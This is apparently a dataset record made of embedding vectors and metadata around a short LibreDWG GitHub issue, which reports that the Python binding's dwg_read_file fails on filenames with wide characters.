0.003562144236639142, 0.011737425811588764, -0.0012405328452587128, 0.004942073952406645, 0.018789509311318398, -0.004376463126391172, 0.01420846302062273, -0.01861300691962242, -0.014673788100481033, -0.006498506758362055, -0.009523119777441025, -0.02382785640656948, 0.010525976307690144, -0.01194601971656084, -0.0039632865227758884, -0.015395844355225563, 0.015524210408329964, 0.024758508428931236, 0.0030125791672617197, -0.027133271098136902, 0.004127755295485258, 0.019880617037415504, 0.016543110832571983, 0.0030326363630592823, 0.02379576675593853, 0.016960300505161285, 0.01970411278307438, -0.003493950003758073, -0.006907671689987183, 0.003251258982345462, -0.0014210469089448452, -0.013309904374182224, 0.0028561337385326624, 0.017056573182344437, -0.011063506826758385, 0.0060211471281945705, 0.013831389136612415, 0.006606814917176962, -0.004516863264143467, -0.0113763976842165, -0.007364973891526461, -0.009539165534079075, -0.021806100383400917, 0.008833155035972595, 0.002743813907727599, -0.008913383819162846, -0.010020536370575428, 0.008865246549248695, -0.007068128790706396, 0.009346617385745049, -0.0038609954062849283, 0.0016276352107524872, -0.013333972543478012, 0.004918005783110857, 0.003746669739484787, 0.0008684732601977885, 0.002461008494719863, 0.0028922364581376314, -0.0064142667688429356, 0.01612592302262783, 0.011937997303903103, 0.0031529790721833706, 0.0228169783949852, 0.0015855152159929276, 0.008415967226028442, -0.00010661612031981349, -0.00796668790280819, -0.004649240057915449, 0.015211318619549274, 0.012595870532095432, 0.006666986271739006, -0.028529245406389236, -0.002246397314593196, 0.0007987747667357326, 0.005475593265146017, -0.00794663093984127, 0.011223963461816311, 0.019944798201322556, 0.025881705805659294, 0.04309873655438423, 0.0037907955702394247, -0.0016597266076132655, -0.027117224410176277, 0.018179772421717644, 0.0069277286529541016, -0.011713357642292976, 0.005981032736599445, -0.005728313233703375, 0.010975255630910397, 0.014039983041584492, 0.018179772421717644, -0.015179228037595749, 0.017939087003469467, 0.001094115781597793, 0.0007566548301838338, -0.011753471568226814, -0.0034317730460315943, 0.006959820166230202, -0.005724301561713219, 0.019880617037415504, 0.00872083567082882, -0.03152979165315628, -0.008496196009218693, -0.008311670273542404, -0.010991301387548447, 0.0031910876277834177, 0.007938607595860958, -0.022014694288372993, 0.017393533140420914, 0.0027077109552919865, 0.017313305288553238, -0.01867718994617462, 0.008231441490352154, 0.022512109950184822, -0.01933506317436695, -0.020137347280979156, -0.004179903771728277, -0.014392988756299019, 0.006113409996032715, -0.012122523039579391, 0.020201530307531357, -0.01194601971656084, 0.0133901322260499, -0.002085940446704626, 0.01078270748257637, -0.002144105965271592, 0.008712812326848507, 0.006249798461794853, -0.01923878863453865, -0.01688007079064846, -0.009844033978879452, 0.012387276627123356, -0.017200985923409462, 0.011954043060541153, -0.007320848293602467, 0.023025572299957275, -0.0006623863591812551, 0.014184394851326942, -0.01779467612504959, -0.013542566448450089, -0.010189016349613667, -0.020137347280979156, -0.01573280431330204, 0.014368919655680656, -0.007052083034068346, 0.006626871880143881, -0.010975255630910397, -0.0013488412369042635, -0.007224574219435453, 0.013293858617544174, -0.0076979221776127815, -0.00632601510733366, 0.007052083034068346, -0.007910527288913727, 0.009667531587183475, 0.0035581327974796295, -0.004585057497024536, 0.017313305288553238, 0.005010268185287714, -0.01579698733985424, -0.01845254935324192, -0.032171618193387985, -0.0007977719069458544, 0.005090496968477964, 0.0018893806263804436, -0.008616538718342781, -0.0037667269352823496, -0.027983691543340683, 0.008584447205066681, -0.00038609953480772674, -0.026764219626784325, 0.0004134273622184992, 0.001884366269223392, 0.00391715532168746, -0.03327877074480057, -0.005764415953308344, -0.001359872636385262, 0.026844447478652, -0.0072967796586453915, -0.077725350856781, 0.008656652644276619, 0.008480150252580643, 0.00030837819213047624, 0.008776995353400707, -0.012234842404723167, 0.026427259668707848, 0.008231441490352154, 0.013165492564439774, -0.010285290889441967, -0.007846345193684101, -0.03194697946310043, 0.01430473756045103, -0.006109398324042559, 0.00017036015924531966, -0.0025171684101223946, -0.004938062746077776, 0.020169438794255257, -0.003022607881575823, -0.007429156918078661, -0.006638906430453062, -0.00531914783641696, -0.00855235569179058, -0.01505888532847166, 0.010164948180317879, 0.012122523039579391, 0.02379576675593853, -0.004163858015090227, 0.0017780635971575975, -0.006699077785015106, -0.013317926786839962, 0.022560248151421547, 0.0013729097554460168, 0.014465194195508957, -0.013061195611953735, -0.028176240622997284, -0.016374632716178894, -0.009547188878059387, 0.005295079201459885, -0.022576292976737022, -0.009972399100661278, 0.004837776999920607, 0.006554666440933943, 0.008295624516904354, -0.003096819156780839, -0.008464104495942593, -0.010814798064529896, 0.011199895292520523, -0.02219119668006897, 0.003349538892507553, -0.007256665732711554, -0.00458104582503438, 0.013855457305908203, -0.010148902423679829, -0.021035905927419662, 0.005981032736599445, -0.011231986805796623, -0.005660119000822306, -0.01845254935324192, -0.02360321767628193, -0.008319692686200142, -0.009579280391335487, 0.008351784199476242, 0.0043203034438192844, 0.0016827923245728016, 0.014433102682232857, -0.00012485556362662464, 0.016671476885676384, 0.02891434170305729, -0.009731713682413101, 0.003325470257550478, 0.012884693220257759, 0.006009113043546677, -0.007393054198473692, -0.004083629231899977, -0.0022123001981526613, -0.011071529239416122, 0.004500817507505417, 0.0037286183796823025, 0.018885783851146698, 0.019912708550691605, -0.001796114956960082, 0.0064263008534908295, -0.0009762802510522306, -0.001463166787289083, 0.008496196009218693, 0.018019314855337143, 0.017233077436685562, 0.014513331465423107, -0.00024407006276305765, 0.020041072741150856, -0.00008323704241774976, 0.015684666112065315, -0.0010680415434762836, 0.013839412480592728, -0.014312759973108768, -0.016478929668664932, 0.011384421028196812, 0.002860145177692175, 0.007421134039759636, -0.0016356580890715122, -0.00608934136107564, 0.004324314650148153, 0.02127659134566784, -0.002260437235236168, -0.006590769160538912, -0.0015464038588106632, -0.0028701736591756344, 0.016406722366809845, -0.013061195611953735, -0.001009374507702887, 0.009499051608145237, 0.005230896640568972, 0.019623884931206703, 0.007368985563516617, 0.004881902597844601, 0.011737425811588764, 0.010806775651872158, -0.037643201649188995, -0.02002502791583538, -0.02150123193860054, 0.008006801828742027, -0.006229741033166647, 0.003142950590699911, 0.010108787566423416, -0.0032111448235809803, 0.002424905775114894, -0.00853630993515253, -0.004589068703353405, -0.010927118360996246, 0.016735659912228584, 0.011937997303903103, -0.005511696450412273, 0.00535123934969306, 0.018179772421717644, -0.020923586562275887, 0.020666854456067085, -0.0024349342565983534, 0.01983247883617878, 0.013085264712572098, -0.025785431265830994, -0.010277267545461655, 0.018773462623357773, -0.01973620429635048, -0.026395168155431747, 0.0064142667688429356, -0.017457716166973114, 0.008512240834534168, 0.01136035192757845, 0.0047936514019966125, 0.012122523039579391, 0.01596546731889248, -0.017184939235448837, 0.013791275210678577, -0.0068113976158201694, -0.0018272035522386432, 0.004095663782209158, 0.02894643321633339, -0.007533453870564699, 0.004653251729905605, 0.005074451211839914, 0.0025332141667604446, -0.007533453870564699, 0.022656520828604698, -0.009643462486565113, -0.0038770411629229784, -0.01750585250556469, -0.0005661121685989201, -0.0019676033407449722, 0.0036243214271962643, -0.00011188111966475844, 0.0006999934557825327, -0.027775097638368607, -0.0023627285845577717, 0.012499596923589706, 0.012603893876075745, -0.01858091540634632, -0.021709825843572617, 0.018099544569849968, -0.012595870532095432, 0.002854128135368228, 0.0011793585726991296, -0.005840633064508438, 0.0006779305986128747, -0.0032332076225429773, -0.020666854456067085, 0.009033726528286934, -0.010020536370575428, 0.011448603123426437, 0.0013287841575220227, 0.02913898229598999, 0.020185483619570732, -0.00045278944890014827, -0.020249666646122932, 0.0012756327632814646, 0.009025703184306622, -0.021693779155611992, -0.009507074020802975, -0.007364973891526461, -0.003792801173403859, 0.004039503633975983, 0.006907671689987183, 0.02061871811747551, 0.02077917568385601, -0.004974165465682745, -0.01898205652832985, 0.0038830582052469254, -0.006919706240296364, -0.009089886210858822, -0.0057042445987463, 0.011127689853310585, -0.002779916627332568, 0.004593080375343561, 0.00023191043874248862, -0.002673613838851452, -0.02042616903781891, 0.0039151497185230255, 0.0010529987048357725, -0.009779850952327251, 0.022431882098317146, 0.03655209392309189, 0.0017168893245980144, 0.03212347999215126, -0.006065272726118565, -0.008030869998037815, 0.00424408633261919, 0.020394079387187958, 0.015772918239235878, 0.017024481669068336, 0.005832610186189413, -0.017746537923812866, 0.00607329560443759, 0.023186029866337776, 0.006125444080680609, -0.013751160353422165, 0.004256120417267084, -0.012515641748905182, -0.017393533140420914, 0.012515641748905182, 0.0024329284206032753, 0.028737839311361313, 0.004837776999920607, -0.006967843044549227, -0.00597300985828042, -0.025320107117295265, 0.011601037345826626, 0.008215395733714104, -0.001138241495937109, 0.0014090125914663076, -0.0134864067658782, 0.009073840454220772, -0.011873814277350903, -0.02206283062696457, 0.009763805195689201, 0.0059770215302705765, -0.012323093600571156, -0.0038489610888063908, -0.007244631182402372, 0.00649048388004303, 0.0014029954327270389, -0.0016837951261550188, -0.00458104582503438, 0.0005041858530603349, 0.00840794388204813, -0.00929045770317316, 0.004954108502715826, 0.005222873762249947, -0.011159781366586685, -0.012218796648085117, 0.012836555950343609, 0.0022865114733576775, -0.005058405455201864, -0.009017680771648884, 0.006747214589267969, -0.005423444788902998, 0.011825677007436752, -0.03183465823531151, 0.001618609530851245, -0.00991623941808939, -0.006245786789804697, -0.010221107862889767, -0.03188279643654823, -0.011897883377969265, 0.014360897243022919, 0.011873814277350903, 0.010598181746900082, -0.01832418330013752, -0.022480018436908722, -0.008255510590970516, -0.0021501232404261827, 0.005852667149156332, -0.0189499668776989, -0.004773594439029694, 0.009450914338231087, -0.025191741064190865, -0.008608515374362469, 0.007108242716640234, 0.023378577083349228, 0.01930297166109085, -0.00023730078828521073, -0.0037827726919203997, 0.02061871811747551, -0.018115589395165443, -0.027839280664920807, 0.004312280565500259, -0.004946085624396801, 0.017521899193525314, -0.005230896640568972, 0.002667596796527505, 0.004809697158634663, 0.007509385235607624, -0.009298480115830898, 0.009675553999841213, 0.00916209165006876, -0.008889314718544483, 0.0018021321156993508, -0.003134927712380886, -0.015821054577827454, 0.0012214785674586892, -0.03684091567993164, 0.011400466784834862, 0.005764415953308344, -0.024437593296170235, 0.01681588776409626, -0.003957269713282585, 0.026988858357071877, 0.016591249033808708, -0.006654952187091112, 0.01558839250355959, 0.0134864067658782, 0.005728313233703375, -0.00925836618989706, -0.009121977724134922, 0.013350018300116062, -0.008616538718342781, 0.00012510627857409418, -0.022528156638145447, -0.005595935974270105, -0.02166168764233589, -0.01152080949395895, 0.002898253733292222, -0.0020137347746640444, -0.004745514132082462, 0.006943774409592152, 0.013277812860906124, -0.010293313302099705, 0.019190652295947075, -0.004585057497024536, 0.017618173733353615, 0.0011582985753193498, -0.019030194729566574, 0.006971854716539383, 0.01298096776008606, 0.024100633338093758, 0.005507684778422117, -0.012202750891447067, 0.003512001596391201, -0.01697634533047676, -0.005411410704255104, 0.01001251395791769, 0.005784472916275263, -0.016069764271378517, 0.001161307212896645, -0.024116680026054382, -0.023234166204929352, 0.006378163583576679, 0.02514360472559929, 0.004073600750416517, 0.0021842203568667173, -0.02146914042532444, 0.0076818764209747314, -0.00007540223305113614, 0.0043724519200623035, 0.07297582179307938, 0.012050316669046879, -0.015508164651691914, 0.01782676763832569, -0.006257820874452591, -0.011625106446444988, -0.003937212284654379, 0.04951701685786247, 0.02055453509092331, 0.016366608440876007, 0.01819581910967827, -0.006233752705156803, -0.008303646929562092, -0.017249122262001038, 0.0030206020455807447, -0.004504828713834286, 0.023266257718205452, -0.008728858083486557, 0.008343761786818504, 0.0007596633513458073, -0.004938062746077776, -0.0032211733050644398, 0.0017991235945373774, -0.0016687522875145078, -0.002093963325023651, -0.008849200792610645, -0.00791855063289404, -0.0268765389919281, -0.013743137940764427, 0.014617628417909145, -0.01973620429635048, 0.003471887204796076, -0.0007962676463648677, 0.008953497745096684, -0.015323638916015625, 0.0072847455739974976, -0.014280668459832668, 0.0230416189879179, -0.0017349408008158207, -0.0015484095783904195, 0.00436041783541441, 0.01412823423743248, 0.015957443043589592, 0.008263533003628254, 0.01002855971455574, -0.0024048485793173313, 0.0021320716477930546, 0.0002767882542684674, 0.0009246331756003201, -0.008672698400914669, -0.024806644767522812, 0.008207373321056366, -0.011087574996054173, -0.017586082220077515, -0.012066362425684929, 0.004107697866857052, 0.024951055645942688, 0.006161546800285578, 0.004669297486543655, -0.008937451988458633, 0.01662334054708481, -0.014569491147994995, 0.0069277286529541016, -0.0025532711297273636, -0.002128060208633542, -0.009683577343821526, 0.004673308692872524, -0.00607329560443759, -0.00598905561491847, -0.008929429575800896, -0.00993228517472744, -0.013061195611953735, 0.0021260546054691076, -0.0012585842050611973, 0.003503978718072176, -0.008873268961906433, 0.026170529425144196, 0.011167803779244423, -0.006939763203263283, -0.023779720067977905, -0.004476748872548342, -0.0028320651035755873, -0.02936362288892269, 0.015845123678445816, 0.005455536302179098, 0.011681266129016876, -0.01763421855866909, 0.005006256978958845, -0.015259455889463425, 0.012202750891447067, -0.0017630207585170865, 0.001647692290134728, -0.007637750823050737, -0.013678954914212227, -0.014473216608166695, -0.014641696587204933, 0.015131090767681599, -0.0077260020188987255, 0.017233077436685562, -0.014545422978699207, -0.00853630993515253, 0.007778150495141745, -0.0038489610888063908, -0.0067913406528532505, -0.014152303338050842, 0.019639931619167328, 0.009908217005431652, 0.014360897243022919, 0.005154679529368877, -0.02828855998814106, 0.0006734177586622536, 0.0007190477335825562, 0.007208528462797403, 0.015227364376187325, 0.006233752705156803, -0.009683577343821526, 0.005475593265146017, 0.00632601510733366, 0.012218796648085117, -0.0135505897924304, 0.008464104495942593, 0.02008921094238758, -0.002898253733292222, 0.004043515305966139, 0.009827988222241402, 0.0030406592413783073, 0.005311124958097935, 0.0009853059891611338, 0.0016837951261550188, 0.03048682026565075, 0.009691599756479263, 0.006482461001724005, -0.0005380322108976543, -0.013005035929381847, 0.02190237306058407, 0.011809631250798702, 0.015716757625341415, -0.005824587307870388, -0.004569011740386486, 0.0268123559653759, 0.017842812463641167, -0.006534609477967024, 0.004833765793591738, -0.002023763256147504, 0.025913797318935394, 0.013173515908420086, -0.004930039867758751, 0.014697857201099396, 0.006418277975171804, -0.012234842404723167, -0.009434868581593037, -0.008672698400914669, 0.017714448273181915, -0.006707100663334131, 0.015516187064349651, -0.034498244524002075, -0.018773462623357773, -0.009787874296307564, 0.026523534208536148, 0.0024930997751653194, -0.0052148508839309216, -0.0018051407532766461, 0.008195338770747185, 0.003973315469920635, 0.015275501646101475, -0.014264622703194618, -0.009603348560631275, -0.00933859497308731, 0.003636355744674802, 0.0017770606791600585, 0.006610826589167118, -0.0035140071995556355, 0.006257820874452591, 0.016117900609970093, -0.004236063454300165, 0.004825742915272713, 0.0037727439776062965, -0.02130868285894394, -0.011167803779244423, -0.014497285708785057, 0.003686498384922743, 0.010943164117634296, 0.020217575132846832, 0.04637205973267555, -0.023362532258033752, 0.010943164117634296, 0.013646863400936127, 0.03376014158129692, -0.009972399100661278, -0.010365518741309643, 0.014874359592795372, 0.04605114459991455, 0.0015022782608866692, 0.008584447205066681, -0.016021626070141792, 0.00462918309494853, 0.005744358990341425, 0.0059770215302705765, -0.011312214657664299, 0.02454991266131401, 0.004962131381034851, -0.003981337882578373, 0.011873814277350903, 0.008335738442838192, 0.010838867165148258, 0.043836839497089386, 0.0009853059891611338, -0.0037286183796823025, -0.016559157520532608, -0.00006518563895951957, 0.002180208917707205 ]
3,043
null
null
null
null
null
null
null
null
null
[ "LibreDWG", "libredwg" ]
Got an "TypeError: in method 'dwg_read_file', argument 1 of type 'char const *'" error while reading dwg that filename contains wide chars.
Python lib doesn't work with wide chars filename
https://api.github.com/repos/LibreDWG/libredwg/issues/393/comments
0
2021-09-01T05:02:58
2021-09-01T17:43:06Z
https://github.com/LibreDWG/libredwg/issues/393
984,622,048
393
false
This is a GitHub Issue repo:libredwg owner:LibreDWG Title : Python lib doesn't work with wide chars filename Issue date: --- start body --- Got an "TypeError: in method 'dwg_read_file', argument 1 of type 'char const *'" error while reading dwg that filename contains wide chars. --- end body ---
298
[ -0.01489927340298891, 0.0032401219941675663, -0.008019521832466125, 0.0413607582449913, 0.03386412188410759, 0.0329476036131382, 0.026461485773324966, 0.04131375998258591, -0.01439401414245367, -0.024957457557320595, -0.003154932986944914, 0.015204778872430325, 0.004529708065092564, 0.009171043522655964, -0.023429930210113525, 0.0054550375789403915, -0.01951710879802704, -0.0015936229610815644, -0.006509619299322367, 0.006403867620974779, 0.024886956438422203, -0.006891501601785421, 0.010915950872004032, 0.005507913418114185, -0.012737234123051167, -0.013019238598644733, 0.00945892371237278, -0.007273383438587189, -0.008430779911577702, -0.008642283268272877, 0.009693928062915802, 0.004926277790218592, 0.026907993480563164, 0.029164034873247147, 0.03172558173537254, -0.02441694773733616, 0.036190666258335114, 0.06627121567726135, -0.0025527344550937414, 0.008301527239382267, -0.021173888817429543, -0.044204313308000565, 0.009218044579029083, 0.044627320021390915, -0.01025793794542551, 0.05710604786872864, 0.007443761453032494, 0.05249996483325958, -0.022172657772898674, -0.009488299489021301, -0.020962385460734367, -0.016579555347561836, -0.01110982894897461, -0.07068929821252823, 0.041666265577077866, -0.028811529278755188, 0.02862352505326271, -0.0007534825708717108, -0.015310531482100487, 0.03151407837867737, -0.012349477037787437, 0.001406353898346424, -0.001700843684375286, 0.014817021787166595, -0.012337726540863514, 0.01748432032763958, -0.014699519611895084, 0.0022061029449105263, -0.028153516352176666, 0.006068986374884844, 0.004191889427602291, 0.01662655547261238, 0.0164503026753664, -0.03167858347296715, 0.027989013120532036, -0.0506669320166111, 0.008765661157667637, -0.0014614331303164363, -0.03666067495942116, -0.004738274496048689, -0.0232301764190197, 0.011356583796441555, -0.013947506435215473, 0.0068621258251369, -0.012678482569754124, 0.019787363708019257, -0.019035348668694496, -0.03962172567844391, -0.062041137367486954, -0.02068037912249565, -0.015898041427135468, 0.0329241044819355, -0.012396477162837982, -0.021538145840168, -0.00010520115029066801, -0.03224259242415428, -0.03299460560083389, 0.006662372499704361, -0.018565339967608452, 0.013536248356103897, -0.002671705326065421, 0.017883827909827232, -0.013618499971926212, -0.02338293008506298, 0.0033723118249326944, -0.0031196821946650743, 0.03191358596086502, -0.009529424831271172, 0.025051459670066833, 0.09089966863393784, -0.00457964651286602, -0.02923453599214554, -0.009611676447093487, -0.0009701271774247289, -0.013324744999408722, 0.028153516352176666, 0.010357814840972424, -0.015028526075184345, -0.01816583424806595, 0.019376106560230255, -0.013265993446111679, -0.04413381218910217, -0.045308832079172134, -0.033323612064123154, -0.03167858347296715, 0.028083015233278275, -0.016579555347561836, -0.021173888817429543, -0.010316689498722553, 0.022254908457398415, -0.02627348154783249, -0.028341520577669144, 0.01068094652146101, -0.007249882910400629, 0.019152851775288582, 0.002737800357863307, -0.034757137298583984, 0.032477594912052155, -0.0024146693758666515, -0.018953097984194756, -0.05555501952767372, -0.039316222071647644, 0.013559749349951744, -0.004127263091504574, -0.04027973860502243, 0.022431161254644394, 0.0007424667710438371, -0.05268796905875206, 0.021408893167972565, 0.010451816953718662, -0.01569828763604164, -0.050619930028915405, 0.045308832079172134, 0.006204113829880953, 0.039057716727256775, -0.00962342694401741, 0.010404815897345543, 0.03149057924747467, -0.012913486920297146, 0.00030422041891142726, 0.00794314593076706, 0.005610728170722723, 0.024534450843930244, -0.026555487886071205, -0.010727946646511555, 0.016344550997018814, 0.05268796905875206, 0.01916460134088993, -0.009952432475984097, 0.025638971477746964, -0.017014311626553535, -0.023089174181222916, 0.018201084807515144, 0.009265044704079628, -0.05268796905875206, -0.003010992892086506, -0.03781219571828842, 0.041407760232686996, -0.018600592389702797, 0.007884394377470016, 0.002019568346440792, 0.0030932442750781775, -0.006157113239169121, 0.016661806032061577, 0.007960771210491657, 0.015921542420983315, 0.04013873636722565, -0.00420070206746459, 0.02458145096898079, 0.016262298449873924, -0.020915383473038673, -0.0035955659113824368, 0.0010861605405807495, -0.043945807963609695, -0.008348528295755386, -0.002145883161574602, -0.02085663378238678, -0.02582697384059429, 0.0027451440691947937, 0.006068986374884844, 0.012737234123051167, 0.022572165355086327, -0.005622478201985359, -0.02137364260852337, -0.04432181268930435, 0.008278027176856995, -0.039739228785037994, 0.04864589497447014, -0.007232257630676031, -0.04744737222790718, 0.019705111160874367, -0.009094666689634323, -0.000038142301491461694, 0.012513979338109493, -0.012408227659761906, 0.008248651400208473, 0.014558517374098301, 0.023194925859570503, 0.00014449092850554734, -0.028835030272603035, 0.02483995631337166, -0.01569828763604164, 0.03445163369178772, 0.002890553092584014, -0.03040955774486065, -0.008113523945212364, 0.004664835520088673, 0.0018462527077645063, -0.030621062964200974, 0.021068137139081955, 0.061524130403995514, -0.024275945499539375, -0.007285133935511112, 0.012478728778660297, 0.032125089317560196, -0.007426136173307896, 0.012396477162837982, -0.05353398248553276, -0.0701252892613411, -0.015028526075184345, 0.030621062964200974, 0.029187535867094994, 0.02017511986196041, -0.019528858363628387, 0.01807183213531971, 0.009006540291011333, -0.013230742886662483, 0.004197764676064253, -0.0177310761064291, 0.017590073868632317, -0.03090306743979454, 0.008307402953505516, 0.05480300635099411, 0.030268555507063866, -0.005167157389223576, 0.0029404915403574705, 0.0003247832937631756, 0.033065106719732285, -0.010839574038982391, -0.022901169955730438, 0.001694968668743968, 0.044204313308000565, -0.03064456209540367, -0.002510139951482415, 0.015204778872430325, -0.029164034873247147, -0.021726148203015327, -0.009035916067659855, 0.01864759251475334, -0.04274728521704674, -0.008319152519106865, -0.03024505451321602, 0.0004274141101632267, -0.01867109350860119, -0.03623766452074051, -0.003648441983386874, 0.018882596865296364, 0.01571003906428814, 0.03181958571076393, -0.011080453172326088, -0.008207526057958603, 0.011156830005347729, 0.008636408485472202, 0.03731868416070938, 0.021408893167972565, -0.040397241711616516, -0.011168580502271652, -0.004805838223546743, -0.00870103482156992, -0.021220888942480087, 0.023030422627925873, 0.019364355131983757, -0.04467432200908661, 0.013853504322469234, -0.033723119646310806, 0.033488113433122635, 0.02500445954501629, -0.03581465780735016, -0.007608264684677124, -0.04093775153160095, 0.019893115386366844, -0.04119625687599182, -0.00034332662471570075, -0.05249996483325958, 0.021549895405769348, -0.023324178531765938, 0.016485553234815598, -0.011309582740068436, -0.01790732890367508, 0.003551502712070942, 0.027660008519887924, -0.011797216720879078, -0.008877287618815899, 0.011808967217803001, -0.0005026889266446233, 0.0015671850414946675, 0.012795984745025635, -0.022137407213449478, -0.007091255392879248, -0.002184071345254779, -0.026531986892223358, 0.026155980303883553, -0.02702549658715725, -0.016497302800416946, 0.06147712841629982, -0.03334711119532585, -0.016027294099330902, 0.027472004294395447, -0.0035280021838843822, -0.02650848589837551, -0.0018154083518311381, -0.010827823542058468, -0.026155980303883553, 0.018013080582022667, -0.029916049912571907, -0.04855189099907875, -0.0321015901863575, -0.01578054018318653, 0.01338349562138319, -0.005995547398924828, -0.021397143602371216, 0.02010461874306202, 0.007220507599413395, -0.017966080456972122, 0.025145461782813072, -0.03536814823746681, 0.020562877878546715, 0.0346396341919899, 0.0056782918982207775, 0.019188102334737778, 0.0005386739503592253, 0.04079674929380417, -0.013912255875766277, 0.03513314574956894, -0.04678935930132866, -0.009229794144630432, 0.002743675373494625, -0.030550561845302582, 0.004562021233141422, 0.019211603328585625, -0.04356979951262474, -0.019904864951968193, 0.006321616005152464, -0.00785501953214407, 0.01949360780417919, 0.00610423693433404, 0.014323513023555279, -0.010998201556503773, -0.00924741942435503, -0.03022155538201332, 0.014723020605742931, 0.010351940058171749, -0.008189900778234005, 0.004844026640057564, -0.016755808144807816, 0.0013997444184496999, 0.03287710249423981, 0.026461485773324966, 0.011474085971713066, -0.004344642162322998, -0.026320483535528183, 0.00009960143506759778, -0.02641448564827442, -0.03485114127397537, 0.014288262464106083, 0.02186715230345726, 0.0014078227104619145, 0.0017772201681509614, 0.0006433243397623301, -0.031796082854270935, -0.022666165605187416, 0.006603621412068605, -0.008219275623559952, -0.05353398248553276, 0.0039686355739831924, 0.029610544443130493, -0.009188668802380562, -0.009082917124032974, 0.015345782041549683, -0.012983988039195538, -0.007179381791502237, -0.021068137139081955, 0.018306836485862732, 0.01882384531199932, -0.017037812620401382, -0.011168580502271652, -0.010099310427904129, -0.015580786392092705, 0.03536814823746681, 0.017519570887088776, -0.038728710263967514, 0.008471905253827572, -0.007831518538296223, -0.0023001048248261213, 0.025709472596645355, 0.01439401414245367, -0.009946557693183422, 0.028999531641602516, -0.04949190840125084, 0.01748432032763958, 0.016086045652627945, -0.03595566004514694, 0.01055756863206625, 0.008648158982396126, 0.02304217219352722, -0.003956885077059269, 0.006403867620974779, 0.05052592605352402, 0.04352279752492905, -0.055273015052080154, -0.025474468246102333, 0.009382546879351139, 0.053157977759838104, 0.052076954394578934, -0.018635842949151993, -0.0049233403988182545, -0.02362968400120735, -0.00007169467426137999, 0.015604286454617977, 0.032971106469631195, -0.01127433218061924, 0.017601823434233665, 0.012067471630871296, -0.023077424615621567, 0.013113240711390972, -0.0059573594480752945, -0.005064343102276325, -0.005819294136017561, 0.05879807844758034, -0.01333649456501007, 0.018812095746397972, 0.02939903922379017, -0.028529522940516472, -0.017789825797080994, -0.02381768822669983, -0.008495406247675419, -0.020198620855808258, 0.018953097984194756, 0.042700283229351044, -0.002211978193372488, -0.014570267871022224, -0.022254908457398415, -0.027895012870430946, 0.025309965014457703, 0.031114570796489716, 0.0038687584456056356, 0.04161926358938217, -0.04373430460691452, 0.019881365820765495, -0.019528858363628387, -0.038211703300476074, -0.0010347533971071243, 0.017190566286444664, -0.013677251525223255, -0.027918512001633644, 0.005064343102276325, -0.006509619299322367, 0.0022105092648416758, 0.016838058829307556, -0.009476548992097378, -0.016932060942053795, -0.07299233973026276, 0.0076846410520374775, -0.046906862407922745, 0.010986451990902424, 0.012302475981414318, 0.01613304577767849, -0.018506590276956558, -0.006638871971517801, 0.034921642392873764, 0.018694592639803886, 0.05564902350306511, 0.014159009791910648, -0.0388462133705616, -0.03844670578837395, 0.05226495862007141, -0.009300296194851398, 0.021491143852472305, 0.030433058738708496, 0.017754575237631798, 0.04168976470828056, 0.008325028233230114, 0.0439223051071167, -0.010522318072617054, 0.054756004363298416, 0.01629754900932312, -0.026296982541680336, 0.04822288453578949, -0.020386625081300735, -0.04483882337808609, 0.04129025712609291, -0.028835030272603035, -0.022525163367390633, -0.04190126806497574, 0.0030697439797222614, -0.03226609155535698, 0.018036581575870514, -0.001132427016273141, 0.012807735241949558, 0.02398218959569931, -0.01588629186153412, -0.03308860585093498, -0.01512252725660801, 0.033981624990701675, 0.02085663378238678, 0.018130583688616753, -0.02362968400120735, -0.006979628000408411, 0.009229794144630432, -0.004062637221068144, -0.019376106560230255, -0.021561644971370697, -0.01122733112424612, 0.023711934685707092, -0.019058849662542343, -0.000495712214615196, 0.01679105870425701, -0.020222121849656105, 0.018518339842557907, -0.007197007071226835, -0.02465195208787918, 0.04469782114028931, -0.03959822654724121, -0.01270198356360197, -0.004570833873003721, 0.0014070883626118302, -0.017801577225327492, 0.02937554009258747, -0.026367483660578728, 0.0011155360843986273, -0.01841258816421032, -0.017613572999835014, -0.016497302800416946, -0.006086611654609442, -0.008501281030476093, 0.04110225290060043, 0.03130257502198219, -0.007813893258571625, 0.018729843199253082, -0.01707306317985058, 0.0006058705039322376, 0.03877571225166321, 0.009194543585181236, -0.013312994502484798, 0.030503559857606888, 0.003936322405934334, 0.030597561970353127, 0.012795984745025635, -0.029352039098739624, -0.015674788504838943, 0.04481532424688339, -0.0016685306327417493, 0.021538145840168, 0.003125557443127036, -0.009858431294560432, 0.0005485881702043116, -0.003407562617212534, 0.006591870915144682, 0.012126222252845764, -0.005102531053125858, -0.0001331079110968858, -0.012983988039195538, -0.014300012961030006, 0.03814120218157768, 0.020504126325249672, -0.002145883161574602, 0.008683409541845322, -0.020128119736909866, -0.024698954075574875, -0.03898721560835838, -0.018107082694768906, 0.028341520577669144, -0.018048331141471863, -0.015980293974280357, 0.016838058829307556, 0.005123094189912081, 0.009400172159075737, 0.021150387823581696, 0.03048005886375904, -0.014135509729385376, 0.013230742886662483, 0.04415731132030487, 0.00626874016597867, -0.00626874016597867, -0.02523946389555931, -0.01258448138833046, 0.04077325016260147, -0.005819294136017561, -0.04281778633594513, 0.013395246118307114, 0.013406996615231037, 0.029093533754348755, 0.041924770921468735, -0.016873309388756752, 0.04241827875375748, -0.0029096470680087805, -0.005663604009896517, 0.009394297376275063, -0.007490762509405613, 0.029281537979841232, 0.011162704788148403, -0.014793521724641323, 0.0076846410520374775, -0.018765093758702278, 0.04448631778359413, 0.04279428720474243, 0.018870847299695015, -0.027918512001633644, 0.00814877450466156, -0.0017904391279444098, -0.0198461152613163, -0.009200419299304485, 0.013971006497740746, -0.013536248356103897, -0.012784235179424286, 0.02897603251039982, 0.010116935707628727, 0.009552925825119019, -0.007931395433843136, 0.008859662339091301, -0.00032588490284979343, -0.010093435645103455, -0.02162039652466774, -0.006603621412068605, -0.003530939808115363, 0.008947789669036865, -0.005537289194762707, 0.0017992517678067088, 0.01739032007753849, 0.024604951962828636, -0.05776406079530716, 0.0017640010919421911, -0.004426893778145313, 0.00962342694401741, 0.03139657527208328, 0.00848953053355217, 0.008542407304048538, 0.0498209148645401, -0.00008151712245307863, 0.0038423205260187387, -0.013019238598644733, 0.017355069518089294, -0.01494627445936203, -0.03308860585093498, 0.017601823434233665, 0.004233015235513449, 0.028506023809313774, 0.008900788612663746, 0.006868001073598862, 0.048081882297992706, 0.03616716340184212, -0.020034117624163628, -0.022066906094551086, -0.018776845186948776, -0.018800344318151474, 0.011221456341445446, 0.013195492327213287, -0.011532836593687534, -0.0070383790880441666, -0.005745855625718832, 0.021408893167972565, 0.0034516258165240288, 0.004089075140655041, -0.03760068863630295, -0.0228071678429842, 